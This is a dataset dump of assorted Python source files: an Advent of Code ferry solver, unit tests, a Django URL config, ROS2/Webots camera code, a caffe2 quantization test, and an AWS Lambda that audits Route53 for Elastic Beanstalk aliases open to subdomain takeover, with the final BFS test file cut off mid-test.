hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
794fbf1811b974bc06de79ee633730607292449b
| 3,242
|
py
|
Python
|
12/navigation.py
|
SteScheller/AoC_2020
|
f60d89d19b6c6c19e12f263fe46bc5f36b737327
|
[
"Unlicense"
] | null | null | null |
12/navigation.py
|
SteScheller/AoC_2020
|
f60d89d19b6c6c19e12f263fe46bc5f36b737327
|
[
"Unlicense"
] | null | null | null |
12/navigation.py
|
SteScheller/AoC_2020
|
f60d89d19b6c6c19e12f263fe46bc5f36b737327
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python3
import re
import math
from typing import List, Tuple
def parse_input(file_path: str) -> List[Tuple[str, int]]:
with open(file_path) as f:
lines = f.readlines()
instructions = list()
for l in lines:
m = re.fullmatch(r'(N|S|E|W|L|R|F)([\d]+)\n', l)
instructions.append((m.group(1), int(m.group(2))))
return instructions
class Ferry:
def __init__(self):
self.pos = (0, 0)
self.wp = (10, 1)
self.angle = 0
def rotate(self, angle: int) -> None:
self.angle += angle
if self.angle < 0: self.angle = -1 * (abs(self.angle) % 360);
else: self.angle %= 360
def forward(self, distance: int) -> None:
x = round(math.cos(self.angle / 180 * math.pi) * distance)
y = round(math.sin(self.angle / 180 * math.pi) * distance)
self.pos = self.pos[0] + x, self.pos[1] + y
def move(self, inst: Tuple[str, int]) -> None:
action, value = inst
if action == 'N': self.pos = (self.pos[0], self.pos[1] + value);
elif action == 'S': self.pos = (self.pos[0], self.pos[1] - value);
elif action == 'E': self.pos = (self.pos[0] + value, self.pos[1]);
elif action == 'W': self.pos = (self.pos[0] - value, self.pos[1]);
elif action == 'L': self.rotate(value);
elif action == 'R': self.rotate(-1 * value);
elif action == 'F': self.forward(value);
def rotate_waypoint(self, angle: int) -> None:
d = math.sqrt(self.wp[0]**2 + self.wp[1]**2)
angle += math.atan2(self.wp[1], self.wp[0]) / math.pi * 180
if angle < 0: angle = -1 * (abs(angle) % 360);
else: angle %= 360
self.wp = (
round(math.cos(angle / 180 * math.pi) * d),
round(math.sin(angle / 180 * math.pi) * d) )
def forward_waypoint(self, distance: int) -> None:
self.pos = (
self.pos[0] + distance * self.wp[0],
self.pos[1] + distance * self.wp[1] )
def move_waypoint(self, inst: Tuple[str, int]) -> None:
action, value = inst
if action == 'N': self.wp = (self.wp[0], self.wp[1] + value);
elif action == 'S': self.wp = (self.wp[0], self.wp[1] - value);
elif action == 'E': self.wp = (self.wp[0] + value, self.wp[1]);
elif action == 'W': self.wp = (self.wp[0] - value, self.wp[1]);
elif action == 'L': self.rotate_waypoint(value);
elif action == 'R': self.rotate_waypoint(-1 * value);
elif action == 'F': self.forward_waypoint(value);
def get_position(self) -> None:
return self.pos
def get_waypoint(self) -> None:
return self.wp
if __name__ == '__main__':
instructions = parse_input('input.txt')
ferry = Ferry()
for inst in instructions:
ferry.move(inst)
pos = ferry.get_position()
print(('The ferry\'s Manhatten distance from its starting positions is '
f'{abs(pos[0]) + abs(pos[1])}.'))
ferry = Ferry()
for inst in instructions:
ferry.move_waypoint(inst)
pos = ferry.get_position()
print(('The ferry\'s Manhatten distance from its starting positions is '
f'{abs(pos[0]) + abs(pos[1])} when using the waypoint method.'))
| 37.264368
| 76
| 0.55768
|
794fbf1b23e1faea30e5fef56f20293dd0bd3d16
| 2,100
|
py
|
Python
|
tests/test_class.py
|
Jon-Burr/memoclass
|
93dc1c67fb14b91245e39a480957d0d31977e795
|
[
"MIT"
] | null | null | null |
tests/test_class.py
|
Jon-Burr/memoclass
|
93dc1c67fb14b91245e39a480957d0d31977e795
|
[
"MIT"
] | null | null | null |
tests/test_class.py
|
Jon-Burr/memoclass
|
93dc1c67fb14b91245e39a480957d0d31977e795
|
[
"MIT"
] | null | null | null |
""" Tests for MemoClass """
from memoclass.memoclass import MemoClass, mutates
from memoclass.memoize import memomethod
import pytest
class PartialSum(MemoClass):
def __init__(self, stored, **kwargs):
super(PartialSum, self).__init__(
mutable_attrs=["call_count"], **kwargs)
self.stored = stored
self.call_count = 0
@memomethod
def __call__(self, other):
self.call_count += 1
return self.stored + other
@mutates
def do_mutate(self):
pass
@classmethod
def reset(cls):
cls.__call__.clear_cache()
@memomethod
def call_twice(self, other):
self(other)
return self(other)
def test_cls():
""" Make sure that the test class is working """
assert PartialSum(5)(3) == 8
def test_cache():
""" Make sure that the cache is working """
PartialSum.reset()
a = PartialSum(5)
assert a(3) == 8
a(3)
assert a(5) == 10
assert a.call_count == 2
a = None
def test_mutate():
""" Make sure that the mutates functionality is working """
PartialSum.reset()
a = PartialSum(5)
assert a(3) == 8
a.stored = 3
assert a(3) == 6
assert a.call_count == 2
a.do_mutate()
assert a(3) == 6
assert a.call_count == 3
def test_disable():
""" Make sure that disabling the cache works correctly """
PartialSum.reset()
a = PartialSum(5)
a.disable_caches()
a(3)
a(3)
assert a.call_count == 2
def test_lock():
""" Make sure that locking works correctly """
PartialSum.reset()
a = PartialSum(5)
a.disable_caches()
with a.locked():
a(3)
a(3)
assert a.call_count == 1
with pytest.raises(ValueError):
a.stored = 5
a(3)
a(3)
assert a.call_count == 3
with a.locked():
a(3)
assert a.call_count == 4
def test_lockedfunc():
""" Make sure that a locking function works properly """
PartialSum.reset()
a = PartialSum(5)
a.disable_caches()
assert a.call_twice(3) == 8
assert a.call_count == 1
| 22.580645
| 63
| 0.594762
|
794fc0bd6c08fc4ec4e6110376ace5447a13868d
| 1,055
|
py
|
Python
|
pycvc/tests/external_tests.py
|
Geosyntec/python-cvc
|
9d92efe81a10d2284f796a39673a17b8ef980d27
|
[
"BSD-3-Clause"
] | null | null | null |
pycvc/tests/external_tests.py
|
Geosyntec/python-cvc
|
9d92efe81a10d2284f796a39673a17b8ef980d27
|
[
"BSD-3-Clause"
] | null | null | null |
pycvc/tests/external_tests.py
|
Geosyntec/python-cvc
|
9d92efe81a10d2284f796a39673a17b8ef980d27
|
[
"BSD-3-Clause"
] | null | null | null |
import sys
import os
from six import StringIO
import datetime
from pkg_resources import resource_filename
import textwrap
from io import StringIO
import nose.tools as nt
from nose.plugins.attrib import attr
from unittest import mock
import numpy.testing as nptest
import pandas.util.testing as pdtest
import numpy as np
import pandas
import pyodbc
import wqio
from wqio import utils
from pycvc import dataAccess, external
def test__fix_nsqd_bacteria_units():
cols = ['param', 'conc_units', 'res']
inputdf = pandas.DataFrame({
'conc_units': ['MPN/100 mL', 'MPN/100 mL', 'CFU/100 mL', 'ug/L'],
'param': ['E Coli', 'E Coli', 'Fecal', 'Copper'],
'res': [1, 2, 3, 4]
})
outputdf = external._fix_nsqd_bacteria_units(inputdf, unitscol='conc_units')
expected = pandas.DataFrame({
'conc_units': ['CFU/100 mL', 'CFU/100 mL', 'CFU/100 mL', 'ug/L'],
'param': ['E Coli', 'E Coli', 'Fecal', 'Copper'],
'res': [1, 2, 3, 4]
})
pdtest.assert_frame_equal(outputdf[cols], expected[cols])
| 25.119048
| 80
| 0.67109
|
794fc0f34398b88aaed2e1cc14c2c36123438118
| 739
|
py
|
Python
|
server/helpers/combineMixerTwitchStreams.py
|
RjDrury/Cryptic_live
|
3091ddfcfd31b65f949a65c5b0292821bb5924c0
|
[
"MIT"
] | null | null | null |
server/helpers/combineMixerTwitchStreams.py
|
RjDrury/Cryptic_live
|
3091ddfcfd31b65f949a65c5b0292821bb5924c0
|
[
"MIT"
] | 4
|
2021-03-10T16:04:23.000Z
|
2022-01-22T11:47:59.000Z
|
server/helpers/combineMixerTwitchStreams.py
|
RjDrury/Cryptic_live
|
3091ddfcfd31b65f949a65c5b0292821bb5924c0
|
[
"MIT"
] | null | null | null |
from operator import itemgetter
def combine_twitch_mix_streams(twitch, mixer):
stream_info = []
for stream in twitch["data"]:
stream_info.append({"name":stream["user_name"], "viewers":stream["viewer_count"]
,"thumbnail":stream["thumbnail_url"],"game_id":stream["game_id"],
"title":stream["title"], "user_id":stream["user_id"], "twitch":True, "mixer":False})
for stream in mixer:
stream_info.append({"name":stream["token"], "viewers":stream["viewersCurrent"]
,"thumbnail":stream["bannerUrl"],"game_id":stream["typeId"], "title":stream["name"],
"platform":"mixer","twitch":False, "mixer":True})
return sorted(stream_info, key=itemgetter("viewers"), reverse=True)
| 46.1875
| 93
| 0.656292
|
794fc190c0dcf82e433a76d90e37c06941508ce7
| 891
|
py
|
Python
|
firstone/firstone/urls.py
|
avulaankith/Django-Codes
|
e4216f6a51b5baa745d5a0214afcaf024d048f44
|
[
"MIT"
] | null | null | null |
firstone/firstone/urls.py
|
avulaankith/Django-Codes
|
e4216f6a51b5baa745d5a0214afcaf024d048f44
|
[
"MIT"
] | null | null | null |
firstone/firstone/urls.py
|
avulaankith/Django-Codes
|
e4216f6a51b5baa745d5a0214afcaf024d048f44
|
[
"MIT"
] | null | null | null |
"""firstone URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path('admin/', admin.site.urls),
path('hello/', include("hello.urls")),
path('tasks/', include("tasks.urls")),
path('newyear/', include("newyear.urls"))
]
| 35.64
| 77
| 0.693603
|
794fc1eae33988609e7152e7521416c14c6eaee3
| 3,574
|
py
|
Python
|
venv/Lib/site-packages/caffe2/quantization/server/int8_gen_quant_params_min_max_test.py
|
Westlanderz/AI-Plat1
|
1187c22819e5135e8e8189c99b86a93a0d66b8d8
|
[
"MIT"
] | 1
|
2022-01-08T12:30:44.000Z
|
2022-01-08T12:30:44.000Z
|
venv/Lib/site-packages/caffe2/quantization/server/int8_gen_quant_params_min_max_test.py
|
Westlanderz/AI-Plat1
|
1187c22819e5135e8e8189c99b86a93a0d66b8d8
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/caffe2/quantization/server/int8_gen_quant_params_min_max_test.py
|
Westlanderz/AI-Plat1
|
1187c22819e5135e8e8189c99b86a93a0d66b8d8
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
import caffe2.python.hypothesis_test_util as hu
import hypothesis.strategies as st
import numpy as np
from caffe2.python import core, workspace
from caffe2.quantization.server import dnnlowp_pybind11
from hypothesis import given, settings
class TestInt8GenQuantParamsMinMaxOperator(hu.HypothesisTestCase):
@settings(max_examples=20, deadline=None)
@given(
n=st.integers(10, 10),
m=st.integers(10, 10),
preserve_sparsity=st.booleans(),
rnd_seed=st.integers(1, 5),
**hu.gcs_cpu_only
)
def test_int8_gen_quant_params_min_max_op(
self, n, m, preserve_sparsity, rnd_seed, gc, dc
):
X_min = 0 if preserve_sparsity else -77
X_max = X_min + 255
np.random.seed(rnd_seed)
X = np.round(np.random.rand(n, m) * (X_max - X_min) + X_min).astype(
np.float32
)
# Calculate X_qparam
hist, bin_edges = np.histogram(X.flatten(), bins=2048)
X_qparam = dnnlowp_pybind11.ChooseStaticQuantizationParams(
np.min(X), np.max(X), hist, preserve_sparsity, 8, "MIN_MAX_QUANTIZATION"
)
# Build a net to generate X's qparam using the Int8GenQuantParamsMinMax op
workspace.FeedBlob("X", X, device_option=gc)
workspace.FeedBlob("X_min", np.array([np.min(X)]), device_option=gc)
workspace.FeedBlob("X_max", np.array([np.max(X)]), device_option=gc)
dnnlowp_pybind11.CreateInt8QuantSchemeBlob(
"quant_scheme", "MIN_MAX_QUANTIZATION", preserve_sparsity
)
assert workspace.HasBlob(
"quant_scheme"
), "Failed to create the quant_scheme blob in current workspace"
gen_quant_params_net = core.Net("gen_quant_params_min_max")
gen_quant_params_op = core.CreateOperator(
"Int8GenQuantParamsMinMax",
["X_min", "X_max", "quant_scheme"],
["quant_param"],
device_option=gc,
)
gen_quant_params_net.Proto().op.extend([gen_quant_params_op])
assert workspace.RunNetOnce(
gen_quant_params_net
), "Failed to run the gen_quant_params net"
scale, zero_point = dnnlowp_pybind11.ObserveInt8QuantParamsBlob("quant_param")
shapes, types = workspace.InferShapesAndTypes(
[gen_quant_params_net],
blob_dimensions={"X": [n, m], "X_min": [1], "X_max": [1], "quant_scheme": [1]},
blob_types={"X": core.DataType.FLOAT, "X_min": core.DataType.FLOAT, "X_max": core.DataType.FLOAT, "quant_scheme": core.DataType.STRING}
)
self.assertEqual(shapes["quant_param"], [1])
self.assertEqual(types["quant_param"], core.DataType.FLOAT)
np.testing.assert_equal(scale, X_qparam.scale)
np.testing.assert_equal(zero_point, X_qparam.zero_point)
| 42.547619
| 148
| 0.643816
|
794fc22fc4e97e6784a7d4704951806c270f9bda
| 247
|
py
|
Python
|
data/aihub/preprocessed_data.py
|
shwksl101/nc_style_transfer
|
104c93f9e0f302fcfff6e7accd1a4f82f90202c3
|
[
"Apache-2.0"
] | null | null | null |
data/aihub/preprocessed_data.py
|
shwksl101/nc_style_transfer
|
104c93f9e0f302fcfff6e7accd1a4f82f90202c3
|
[
"Apache-2.0"
] | null | null | null |
data/aihub/preprocessed_data.py
|
shwksl101/nc_style_transfer
|
104c93f9e0f302fcfff6e7accd1a4f82f90202c3
|
[
"Apache-2.0"
] | null | null | null |
import sentencepiece as spm
def make_vocab_file():
spm.SentencePieceTrainer.train(input='./colloquial_literary.txt', model_prefix='spm',
vocab_size=50000)
if __name__ == '__main__':
make_vocab_file()
| 22.454545
| 89
| 0.647773
|
794fc3610962879f1eaf886ac05d401e19a3d9d3
| 198
|
py
|
Python
|
instrument/instrument/doctype/pick_list_items/pick_list_items.py
|
sds2402/rushabhinstruments_V13
|
2a3e293996b9b01f952aa3f76b8b679dce98bc3e
|
[
"MIT"
] | 1
|
2021-07-14T12:34:14.000Z
|
2021-07-14T12:34:14.000Z
|
instrument/instrument/doctype/pick_list_items/pick_list_items.py
|
sds2402/rushabhinstruments_V13
|
2a3e293996b9b01f952aa3f76b8b679dce98bc3e
|
[
"MIT"
] | null | null | null |
instrument/instrument/doctype/pick_list_items/pick_list_items.py
|
sds2402/rushabhinstruments_V13
|
2a3e293996b9b01f952aa3f76b8b679dce98bc3e
|
[
"MIT"
] | 4
|
2021-07-06T10:01:11.000Z
|
2021-12-28T20:40:30.000Z
|
# Copyright (c) 2021, instrument and contributors
# For license information, please see license.txt
# import frappe
from frappe.model.document import Document
class PickListItems(Document):
pass
| 22
| 49
| 0.79798
|
794fc37a26a947f0f14c2b2defeb4af7b7070785
| 7,128
|
py
|
Python
|
terraform-modules/lambda/code/alias-eb/alias-eb.py
|
trustedshops/domain-protect
|
d103aa086b8d937eeb21d76685d317818c6d344c
|
[
"Apache-2.0"
] | null | null | null |
terraform-modules/lambda/code/alias-eb/alias-eb.py
|
trustedshops/domain-protect
|
d103aa086b8d937eeb21d76685d317818c6d344c
|
[
"Apache-2.0"
] | null | null | null |
terraform-modules/lambda/code/alias-eb/alias-eb.py
|
trustedshops/domain-protect
|
d103aa086b8d937eeb21d76685d317818c6d344c
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import os, boto3
import logging
import json
import dns.resolver
from botocore.exceptions import ClientError
from datetime import datetime
def json_serial(obj):
"""JSON serializer for objects not serializable by default json code"""
if isinstance(obj, datetime):
serial = obj.isoformat()
return serial
raise TypeError("Type not serializable")
def assume_role(account, security_audit_role_name, external_id, project, region):
security_audit_role_arn = "arn:aws:iam::" + account + ":role/" + security_audit_role_name
stsclient = boto3.client('sts')
try:
if external_id == "":
assumed_role_object = stsclient.assume_role(RoleArn = security_audit_role_arn, RoleSessionName = project)
print("Assumed " + security_audit_role_name + " role in account " + account)
else:
assumed_role_object = stsclient.assume_role(RoleArn = security_audit_role_arn, RoleSessionName = project, ExternalId = external_id)
print("Assumed " + security_audit_role_name + " role in account " + account)
except Exception:
logging.exception("ERROR: Failed to assume " + security_audit_role_name + " role in AWS account " + account)
credentials = assumed_role_object['Credentials']
aws_access_key_id = credentials["AccessKeyId"]
aws_secret_access_key = credentials["SecretAccessKey"]
aws_session_token = credentials["SessionToken"]
boto3_session = boto3.session.Session(aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, region_name=region)
return boto3_session
def vulnerable_alias_eb(domain_name):
try:
dns.resolver.resolve(domain_name, 'A')
return "False"
except dns.resolver.NoAnswer:
return "True"
except:
return "False"
def lambda_handler(event, context):
# set variables
region = os.environ['AWS_REGION']
org_primary_account = os.environ['ORG_PRIMARY_ACCOUNT']
security_audit_role_name = os.environ['SECURITY_AUDIT_ROLE_NAME']
external_id = os.environ['EXTERNAL_ID']
project = os.environ['PROJECT']
sns_topic_arn = os.environ['SNS_TOPIC_ARN']
vulnerable_domains = []
json_data = {"Findings": []}
boto3_session = assume_role(org_primary_account, security_audit_role_name, external_id, project, region)
client = boto3_session.client(service_name = "organizations")
try:
paginator_accounts = client.get_paginator('list_accounts')
pages_accounts = paginator_accounts.paginate()
for page_accounts in pages_accounts:
accounts = page_accounts['Accounts']
for account in accounts:
account_id = account['Id']
account_name = account['Name']
try:
boto3_session = assume_role(account_id, security_audit_role_name, external_id, project, region)
client = boto3_session.client('route53')
try:
paginator_zones = client.get_paginator('list_hosted_zones')
pages_zones = paginator_zones.paginate()
i=0
for page_zones in pages_zones:
hosted_zones = page_zones['HostedZones']
#print(json.dumps(hosted_zones, sort_keys=True, indent=2, default=json_serial))
for hosted_zone in hosted_zones:
i = i + 1
if not hosted_zone['Config']['PrivateZone']:
print("Searching for Elastic Beanstalk alias records in hosted zone %s" % (hosted_zone['Name']) )
try:
paginator_records = client.get_paginator('list_resource_record_sets')
pages_records = paginator_records.paginate(HostedZoneId=hosted_zone['Id'], StartRecordName='_', StartRecordType='NS')
for page_records in pages_records:
record_sets = page_records['ResourceRecordSets']
#print(json.dumps(record_sets, sort_keys=True, indent=2, default=json_serial))
for record in record_sets:
if "AliasTarget" in record:
if "elasticbeanstalk.com" in record['AliasTarget']['DNSName']:
print("checking if " + record['Name'] + " is vulnerable to takeover")
domain_name = record['Name']
try:
result = vulnerable_alias_eb(domain_name)
if result == "True":
print(domain_name + "in " + account_name + " is vulnerable")
vulnerable_domains.append(domain_name)
json_data["Findings"].append({"Account": account_name, "AccountID" : str(account_id), "Domain": domain_name})
except:
pass
except:
print("ERROR: Lambda execution role requires route53:ListResourceRecordSets permission in " + account_name + " account")
if i == 0:
print("No hosted zones found in " + account_name + " account")
except:
print("ERROR: Lambda execution role requires route53:ListHostedZones permission in " + account_name + " account")
except:
print("ERROR: unable to assume role in " + account_name + " account " + account_id)
except Exception:
logging.exception("ERROR: Unable to list AWS accounts across organization with primary account " + org_primary_account)
try:
print(json.dumps(json_data, sort_keys=True, indent=2, default=json_serial))
#print(json_data)
client = boto3.client('sns')
if len(vulnerable_domains) > 0:
response = client.publish(
TargetArn=sns_topic_arn,
Subject="Vulnerable Elastic Beanstalk alias records found in Amazon Route53",
Message=json.dumps({'default': json.dumps(json_data)}),
MessageStructure='json'
)
print(response)
except:
logging.exception("ERROR: Unable to publish to SNS topic " + sns_topic_arn)
| 50.553191
| 180
| 0.55289
|
794fc40d5e82408b04fa887b84ce64e912add7c8
| 6,765
|
py
|
Python
|
webots_ros2_core/webots_ros2_core/devices/camera_device.py
|
renan028/webots_ros2
|
24cfd4e99b73b89e38f3f4993339473c27fa7661
|
[
"Apache-2.0"
] | 1
|
2021-02-25T05:03:38.000Z
|
2021-02-25T05:03:38.000Z
|
webots_ros2_core/webots_ros2_core/devices/camera_device.py
|
renan028/webots_ros2
|
24cfd4e99b73b89e38f3f4993339473c27fa7661
|
[
"Apache-2.0"
] | null | null | null |
webots_ros2_core/webots_ros2_core/devices/camera_device.py
|
renan028/webots_ros2
|
24cfd4e99b73b89e38f3f4993339473c27fa7661
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 1996-2021 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Camera device."""
from sensor_msgs.msg import Image, CameraInfo
from webots_ros2_msgs.msg import RecognitionObjects, RecognitionObject
from rclpy.time import Time
from rclpy.qos import DurabilityPolicy, HistoryPolicy, QoSProfile, QoSReliabilityPolicy, qos_profile_sensor_data
from .sensor_device import SensorDevice
class CameraDevice(SensorDevice):
"""
ROS2 wrapper for Webots Camera node.
Creates suitable ROS2 interface based on Webots [Camera](https://cyberbotics.com/doc/reference/camera) node instance:
It allows the following functinalities:
- Publishes raw image of type `sensor_msgs/Image`
- Publishes intrinsic camera parameters of type `sensor_msgs/CameraInfo` (latched topic)
Args:
node (WebotsNode): The ROS2 node.
device_key (str): Unique identifier of the device used for configuration.
wb_device (Camera): Webots node of type Camera.
Kwargs:
params (dict): Inherited from `SensorDevice`
"""
def __init__(self, node, device_key, wb_device, params=None):
super().__init__(node, device_key, wb_device, params)
self._camera_info_publisher = None
self._recognition_publisher = None
self._image_publisher = None
# Create topics
if not self._disable:
self._image_publisher = self._node.create_publisher(
Image,
self._topic_name + '/image_raw',
qos_profile_sensor_data
)
self._camera_info_publisher = self._node.create_publisher(
CameraInfo,
self._topic_name + '/camera_info',
QoSProfile(
depth=1,
reliability=QoSReliabilityPolicy.RELIABLE,
durability=DurabilityPolicy.TRANSIENT_LOCAL,
history=HistoryPolicy.KEEP_LAST,
)
)
if self._wb_device.hasRecognition():
self._recognition_publisher = self._node.create_publisher(
RecognitionObjects,
self._topic_name + '/recognition',
qos_profile_sensor_data
)
# CameraInfo data
self.__message_info = CameraInfo()
self.__message_info.header.stamp = Time(seconds=self._node.robot.getTime()).to_msg()
self.__message_info.height = self._wb_device.getHeight()
self.__message_info.width = self._wb_device.getWidth()
self.__message_info.distortion_model = 'plumb_bob'
focal_length = self._wb_device.getFocalLength()
if focal_length == 0:
focal_length = 570.34 # Identical to Orbbec Astra
self.__message_info.d = [0.0, 0.0, 0.0, 0.0, 0.0]
self.__message_info.r = [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0]
self.__message_info.k = [
focal_length, 0.0, self._wb_device.getWidth() / 2,
0.0, focal_length, self._wb_device.getHeight() / 2,
0.0, 0.0, 1.0
]
self.__message_info.p = [
focal_length, 0.0, self._wb_device.getWidth() / 2, 0.0,
0.0, focal_length, self._wb_device.getHeight() / 2, 0.0,
0.0, 0.0, 1.0, 0.0
]
self._camera_info_publisher.publish(self.__message_info)
# Load parameters
camera_period_param = node.declare_parameter(wb_device.getName() + '_period', self._timestep)
self._camera_period = camera_period_param.value
def step(self):
stamp = super().step()
if not stamp:
return
# Publish camera data
if self._image_publisher.get_subscription_count() > 0 or self._always_publish:
self._wb_device.enable(self._timestep)
image = self._wb_device.getImage()
if image is None:
return
# Image data
msg = Image()
msg.header.stamp = stamp
msg.header.frame_id = self._frame_id
msg.height = self._wb_device.getHeight()
msg.width = self._wb_device.getWidth()
msg.is_bigendian = False
msg.step = self._wb_device.getWidth() * 4
# We pass `data` directly to we avoid using `data` setter.
# Otherwise ROS2 converts data to `array.array` which slows down the simulation as it copies memory internally.
# Both, `bytearray` and `array.array`, implement Python buffer protocol, so we should not see unpredictable
# behavior.
# deepcode ignore W0212: Avoid conversion from `bytearray` to `array.array`.
msg._data = image
msg.encoding = 'bgra8'
self._image_publisher.publish(msg)
self.__message_info.header.stamp = Time(seconds=self._node.robot.getTime()).to_msg()
self._camera_info_publisher.publish(self.__message_info)
if self._wb_device.hasRecognition() and self._recognition_publisher.get_subscription_count() > 0:
self._wb_device.recognitionEnable(self._timestep)
objects = self._wb_device.getRecognitionObjects()
if objects is None:
return
# Recognition data
msg = RecognitionObjects()
msg.header.stamp = stamp
msg.header.frame_id = self._frame_id
for obj in objects:
msg_obj = RecognitionObject()
msg_obj.position = obj.get_position()
msg_obj.position_on_image = obj.get_position_on_image()
msg_obj.size_on_image = obj.get_size_on_image()
msg_obj.number_of_colors = obj.get_number_of_colors()
msg_obj.colors = obj.get_colors()
msg_obj.model = str(obj.get_model())
msg.objects.append(msg_obj)
self._recognition_publisher.publish(msg)
else:
self._wb_device.recognitionDisable()
else:
self._wb_device.disable()
| 42.816456
| 123
| 0.610791
|
794fc48adf79a4fcf42ee037e7f35fea076f24dc
| 947
|
py
|
Python
|
src/vsc/model/expr_dynamic_model.py
|
fvutils/py-vsc
|
e30ffae1b750d8182d102b1fe5b1cfdce017a092
|
[
"Apache-2.0"
] | 54
|
2020-03-28T17:54:00.000Z
|
2022-03-27T08:53:13.000Z
|
src/vsc/model/expr_dynamic_model.py
|
fvutils/py-vsc
|
e30ffae1b750d8182d102b1fe5b1cfdce017a092
|
[
"Apache-2.0"
] | 124
|
2020-04-10T03:06:03.000Z
|
2022-03-24T18:35:46.000Z
|
src/vsc/model/expr_dynamic_model.py
|
fvutils/py-vsc
|
e30ffae1b750d8182d102b1fe5b1cfdce017a092
|
[
"Apache-2.0"
] | 17
|
2020-04-09T21:47:58.000Z
|
2022-02-23T19:37:37.000Z
|
'''
Created on Aug 21, 2020
@author: ballance
'''
from vsc.model.expr_model import ExprModel
class ExprDynamicModel(ExprModel):
'''Base class for expressions that must be computed dynamically'''
def __init__(self):
self.cached_expr = None
self.cached_node = None
pass
def reset(self):
self.cached_expr = None
self.cached_node = None
def expr(self):
if self.cached_expr is None:
self.cached_expr = self.build_expr()
return self.cached_expr
def build(self, btor, ctx_width=-1):
if self.cached_expr is None:
self.cached_expr = self.build_expr()
if self.cached_node is None:
self.cached_node = self.cached_expr.build(btor)
return self.cached_node
def build_expr(self):
raise Exception("Class " + str(type(self)) + " does not implement build_expr")
| 27.057143
| 86
| 0.608237
|
794fc4af9d6e7ef0f36216f8f67d788d184fdda2
| 37
|
py
|
Python
|
login.py
|
TmacChenQian/django26
|
59c0afe075a5c9454a42bb27cdba8ac56e7582fc
|
[
"MIT"
] | null | null | null |
login.py
|
TmacChenQian/django26
|
59c0afe075a5c9454a42bb27cdba8ac56e7582fc
|
[
"MIT"
] | null | null | null |
login.py
|
TmacChenQian/django26
|
59c0afe075a5c9454a42bb27cdba8ac56e7582fc
|
[
"MIT"
] | null | null | null |
num1=1
num2=2
num3=3
num4=40
num5=5
| 5.285714
| 7
| 0.702703
|
794fc589249a0f67eb431bdc67e3e34101fc1481
| 938
|
py
|
Python
|
graph/BFS/test_BFS.py
|
s1s1ty/Algo-DS-Implementation
|
56c40fe107a48b5562794775d671db88d04594b3
|
[
"MIT"
] | 9
|
2018-03-29T13:03:45.000Z
|
2020-01-22T10:42:47.000Z
|
graph/BFS/test_BFS.py
|
s1s1ty/Algo-DS-Implementation
|
56c40fe107a48b5562794775d671db88d04594b3
|
[
"MIT"
] | null | null | null |
graph/BFS/test_BFS.py
|
s1s1ty/Algo-DS-Implementation
|
56c40fe107a48b5562794775d671db88d04594b3
|
[
"MIT"
] | 4
|
2018-03-29T13:06:41.000Z
|
2020-11-22T13:58:19.000Z
|
import unittest
import collections
from BFS import BFSM, BFS
class BFSTestCase(unittest.TestCase):
def test(self):
ob = BFS()
graph = collections.defaultdict(set)
graph[1] = [2, 3, 5]
graph[2] = [8]
graph[3] = [5,4]
graph[8] = [4]
source = 2
destination = 4
ob.bfs(graph, source)
self.assertEqual(ob.cost_print(destination), 2, msg="Cost should be 2")
class BFSMTestCase(unittest.TestCase):
""" Test for BFS.py"""
def test(self):
ob = BFSM()
# test data
ob.am[1][2] = 1
ob.am[1][3] = 1
ob.am[1][5] = 1
ob.am[3][5] = 1
ob.am[8][4] = 1
ob.am[2][8] = 1
ob.am[3][4] = 1
source = 1
destination = 4
ob.bfs(source)
